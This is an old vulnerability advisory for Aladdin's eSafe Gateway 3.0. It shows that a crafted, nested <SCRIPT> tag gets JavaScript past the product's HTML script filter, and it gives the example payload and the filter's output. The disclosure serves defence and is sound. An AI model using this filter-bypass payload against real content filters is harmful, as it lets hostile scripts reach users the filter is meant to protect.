Product: eSafe Gateway Vendor: Aladdin Knowledge Systems (www.ealaddin.com) Vesrsion: 3.0 was tested and found vulnerable, earlier versions might be vulnerable as well. Status: Vendor was informed. Background -------------------- eSafe Gateway 3.0 is an Internet Content Security product. You can configure eSafe Gateway to remove scripts (VBScripts, JavaScripts) and other executable tags from incoming HTML documents. Alternatively, the administrator can ban certain scripting commands from appearing inside scripts. The banned commands will be removed, while the rest of the HTML page is left intact. The problem ---------------------- Using specially crafted HTML files, an attacker can easily bypass eSafe's script filtering mechanism. Details ---------------------- Let's say for example that we want the following HTML code to enter an organization and the script it contains to be executed: <HTML><HEAD></HEAD> <BODY> <SCRIPT language="JavaScript"> alert("hi"); </SCRIPT> </BODY></HTML> If we run this page through eSafe's filtering engine, the script will be filtered and the resulting with the following HTML code: <HTML><HEAD></HEAD> <BODY> </BODY></HTML> However, if we create the following code: <HTML><HEAD></HEAD> <BODY> <SCRIPT<script language="javascript"> </script> language="javascript"> alert("hi"); </SCRIPT> </BODY></HTML> Then the inner "<script language="javascript"> </script>" will be extracted and we will be left with the following HTML code: <HTML><HEAD></HEAD> <BODY> <SCRIPT language="javascript"> alert("hi"); </SCRIPT> </BODY></HTML> Solution ------------------ Do not rely on eSafe Gateway for HTML filtering until Aladdin fixes the problem. ==================== Discovered by: eDvice Security Services [EMAIL PROTECTED] http://www.edvicetech.com Tel: +972-3-6120133 Fax: +972-3-6954837